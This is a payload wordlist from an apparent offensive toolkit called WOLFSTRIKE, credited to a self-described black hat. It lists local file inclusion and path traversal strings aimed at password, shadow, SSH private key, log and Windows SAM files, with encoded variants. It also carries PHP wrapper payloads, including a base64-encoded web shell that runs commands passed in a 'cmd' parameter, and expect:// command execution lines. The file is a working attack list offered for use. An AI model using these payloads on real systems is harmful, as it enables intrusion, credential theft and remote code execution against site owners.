# wordlists/lfi_payloads.txt
# WOLFSTRIKE LFI Payloads
# Author: ATHEX BLACK HAT | Team: Wolf Intelligence PK
# Categories: Path Traversal, PHP Wrappers, Log Injection, /proc

# === BASIC PATH TRAVERSAL ===
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
.../.../.../.../etc/passwd
....\/....\/....\/etc/passwd
..;/..;/..;/etc/passwd
../../etc/passwd%00
../../etc/passwd%00.html
../../etc/passwd%00.php
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/etc/group
/etc/resolv.conf
/etc/crontab
/etc/fstab
/etc/mtab
/etc/sudoers
/etc/ssh/sshd_config
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf
/etc/nginx/nginx.conf
/etc/my.cnf
/etc/mysql/my.cnf
/etc/php.ini
/etc/php5/apache2/php.ini
/etc/php7.0/apache2/php.ini
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/messages
/var/log/syslog
/var/log/auth.log
/var/log/mysql/error.log
/var/log/mysqld.log
/proc/self/environ
/proc/self/cmdline
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/version
/proc/cpuinfo
/proc/meminfo
/proc/net/tcp
/proc/net/udp
/proc/net/arp
/proc/net/route
/proc/mounts
/proc/self/mounts
/home/user/.bash_history
/root/.bash_history
/home/user/.ssh/id_rsa
/root/.ssh/id_rsa
/home/user/.ssh/authorized_keys
/root/.ssh/authorized_keys
/home/user/.ssh/known_hosts
/root/.ssh/known_hosts

# === URL ENCODED PATH TRAVERSAL ===
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd

# === PHP WRAPPER PAYLOADS ===
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../index.php
php://filter/convert.base64-decode/resource=data://plain,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php://filter/string.rot13/resource=index.php
php://filter/string.toupper/resource=index.php
php://filter/string.tolower/resource=index.php
php://input
php://input%00
php://fd/0
php://fd/1
php://temp
php://memory
data://text/plain,<?php phpinfo(); ?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
data://text/plain,<?php system('id'); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
expect://id
expect://whoami
expect://ls
expect://uname -a
compress.zlib://data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
zip://archive.zip#shell.php
phar://archive.phar/shell.php

# === WINDOWS PATH TRAVERSAL ===
C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\Windows\system.ini
C:\Windows\boot.ini
C:\Windows\debug\NetSetup.log
C:\Windows\repair\SAM
C:\Windows\repair\SYSTEM
C:\Windows\System32\config\AppEvent.Evt
C:\Windows\System32\config\SecEvent.Evt
C:\Windows\System32\config\default.sav
C:\Windows\System32\config\security.sav
C:\Windows\System32\config\software.sav
C:\Windows\System32\config\system.sav
C:\xampp\apache\conf\httpd.conf
C:\xampp\php\php.ini
C:\xampp\htdocs\config.php
C:\inetpub\wwwroot\web.config
C:\Program Files\MySQL\my.ini
....\....\....\windows\win.ini
....\....\....\....\windows\win.ini
..\..\..\..\windows\win.ini
..\..\..\windows\win.ini
/../../windows/win.ini
/../../windows/system.ini

# === LOG FILE INJECTION ===
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/proftpd.log
/var/log/mail.log
/var/log/maillog
/var/log/auth.log
/var/log/secure
/var/log/wtmp
/var/log/lastlog
/var/log/faillog
/var/log/btmp
/var/log/cron
/var/log/messages
/var/log/syslog
/var/log/dmesg
/var/log/boot.log
/var/log/kern.log
/var/log/daemon.log
/var/log/debug
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2